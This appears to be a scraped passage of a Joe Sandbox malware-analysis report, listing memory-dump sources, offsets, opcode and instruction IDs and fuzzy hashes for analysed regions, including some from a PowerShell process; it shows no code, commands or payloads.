• Opcode Fuzzy Hash: 66c96110b60ec4884e40784ec229783d02c8652ff8cbc5ba588a45c1a2a673a4
• Instruction Fuzzy Hash: 83B1797640E3D19FC7038B7898A56967FB1AE13210B1E45DBC4C0CF0E3D268695AC7A7
Strings
Memory Dump Source
• Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
Similarity
• API ID:
• String ID: a[QF$r
• API String ID: 0-1978461061
• Opcode ID: 496fad5cb50b8b7599b23414be125da6252d08c30d03b36882e5ded4db30a48d
• Instruction ID: 1c7cf25edb3e3dd76e0d3c53df9726371234a66cebb86912a04f91a9c9897a26
• Opcode Fuzzy Hash: 496fad5cb50b8b7599b23414be125da6252d08c30d03b36882e5ded4db30a48d
• Instruction Fuzzy Hash: C671BE3240E3D19FC703CB7899A1685BFB1BE53214B1D45DAD4C08F4A7D228A96AC7A6
Strings
Memory Dump Source
• Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00737000, based on PE: false
• Associated: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
Yara matches
Similarity
• API ID:
• String ID: QQWH
• API String ID: 0-2994139501
• Opcode ID: 15f92bf1d367a182b2b911103a80d07649b1c7d2d4ae395c48c64e81f543c824
• Instruction ID: 3e7d00a824db8bb06332de0195f09c6f3af68370aced01b16df0723b474b60d4
• Opcode Fuzzy Hash: 15f92bf1d367a182b2b911103a80d07649b1c7d2d4ae395c48c64e81f543c824
• Instruction Fuzzy Hash: E141123244E3C15FE7138B7089AA552BFB0AE13315B1944EFC4C18F0A3E2AC595AC763
Strings
Memory Dump Source
• Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
Similarity
• API ID:
• String ID: a[QF
• API String ID: 0-4264035995
• Opcode ID: 1901d56a1a29fd2292e8c20859f2a150f3856ea72a3f95cd4161f33c1669df62
• Instruction ID: 483ad5229aa4ba27b1344ef492e538fb60a70c00c17c35f96c86b281de6574ca
• Opcode Fuzzy Hash: 1901d56a1a29fd2292e8c20859f2a150f3856ea72a3f95cd4161f33c1669df62
• Instruction Fuzzy Hash: 4981AC7640E3D19FC703CB789961581BFB1AE53210B1D45DBD4C0CF4A3D228A96ACBA7
Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF
                                                                                                                                                                  • API String ID: 0-4264035995
                                                                                                                                                                  • Opcode ID: fcb9c323dd756e8f8cae2414ee5856f73bb0c628027c9cdfce52dac107201f70
                                                                                                                                                                  • Instruction ID: 59425944e3e68f0f3363c892f07d8e6ea2ca7a51f7b3e78ec723311e75237a21
                                                                                                                                                                  • Opcode Fuzzy Hash: fcb9c323dd756e8f8cae2414ee5856f73bb0c628027c9cdfce52dac107201f70
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D71BC7640E3D19FC703CB789962581BF71AE53210B2D45DBD4C08F4A3D228A96ACBA7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: a[QF
                                                                                                                                                                  • API String ID: 0-4264035995
                                                                                                                                                                  • Opcode ID: 8f2b074ec315cfc8745205afef82ffc13564b617225d86a8921075cd7475ada0
                                                                                                                                                                  • Instruction ID: 71e57cf3f839f3bbad26398f11c7b9e41bb0618dd1f2d388c37d4e382d97ab9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2b074ec315cfc8745205afef82ffc13564b617225d86a8921075cd7475ada0
                                                                                                                                                                  • Instruction Fuzzy Hash: AB819C7640E3D19FC703CB7899626C57FB1AF53210B1E45DBD4C08F4A3D228696ACBA6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00737000, based on PE: false
                                                                                                                                                                  • Associated: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ffbef5d550962080b8a535e66814e933bed3cf14a48b793becf25215819b8bc9
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: ffbef5d550962080b8a535e66814e933bed3cf14a48b793becf25215819b8bc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 00739000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2315999928.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Offset: 0073B000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_737000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction ID: 7d01c3a2b021918f052d3ea2ccdd239ea2343c8eb2bf4207a9238942505c8778
                                                                                                                                                                  • Opcode Fuzzy Hash: e6d088f78e8a94eb8445d9d972198c58c506f00bdbcaea7cdbf3233ce817c149
                                                                                                                                                                  • Instruction Fuzzy Hash: 9481643244A3D29FC723CF34C9A16CABFB5EE43320B6842CAD4D18B5A7D3256516D792
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000704000.00000004.00000020.00020000.00000000.sdmp, Offset: 00704000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_704000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                  • Instruction ID: ce3f125ba10db27b030a236aa4f528377a642416cc90ca893c8cdaafbff968e5
                                                                                                                                                                  • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                  • Instruction Fuzzy Hash: B12122611092D48FC303CF74D5A4A82BFA1FF8B31A39E40DCC8C18F427C2A56542CB42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000003.2276511844.0000000000704000.00000004.00000020.00020000.00000000.sdmp, Offset: 00704000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_3_704000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 185064ec45febd044bc71aaf9ffdb2091f1134970eea16bb721987bc805bfb6f
                                                                                                                                                                  • Instruction ID: fe347770ed016e44368d0e236e89ded51d902b93617c31f7cb10c2ba04f2125b
                                                                                                                                                                  • Opcode Fuzzy Hash: 185064ec45febd044bc71aaf9ffdb2091f1134970eea16bb721987bc805bfb6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6521037080E3D18FC7239F309865152BFB0AE67214B1A4ACFC1C1CB0E3E6295819CB63

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                  • API String ID: 0-1293621312
                                                                                                                                                                  • Opcode ID: 946d6534703c1f80d1cf31ec4b40041b019bd6e52295504abffacbeedb8d9cbb
                                                                                                                                                                  • Instruction ID: c2c9c94f2d0b20d6040386c7a2b05689e7bf86b86182949e69af710e669970da
                                                                                                                                                                  • Opcode Fuzzy Hash: 946d6534703c1f80d1cf31ec4b40041b019bd6e52295504abffacbeedb8d9cbb
                                                                                                                                                                  • Instruction Fuzzy Hash: D30227B1B0421DCFCB259B68980176BBBE2AFC5314F24827ADD15DB391DB36C942C7A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9b0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c70382b396eb91ed9729607867a6a0cd3d44fef21dd371b7f22f5012c2bdbc7b
                                                                                                                                                                  • Instruction ID: 69851d85de67bd6266af888cd769544a45a3206d6549d6fc170c9980ff718dfa
                                                                                                                                                                  • Opcode Fuzzy Hash: c70382b396eb91ed9729607867a6a0cd3d44fef21dd371b7f22f5012c2bdbc7b
                                                                                                                                                                  • Instruction Fuzzy Hash: FF22B070A042459FCB06CF5CC9949EEBBB1FF49320B2581AAD455DB3A6C735EC91CBA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2fc8bab13acbb8b7b68a4df88b90c42d99fe2bf7394de16cb22d8d683604b6f7
                                                                                                                                                                  • Instruction ID: 0c2666a56e17606e892a2bb3f27e371ec5dbd947f41e9af51e877966650e9119
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fc8bab13acbb8b7b68a4df88b90c42d99fe2bf7394de16cb22d8d683604b6f7
                                                                                                                                                                  • Instruction Fuzzy Hash: CE41F3F4B0420DDFCB618F68850276BBBE6AF84394F1883A6DD059F295D735C941C7A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2479591266.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin

Non-executed Functions
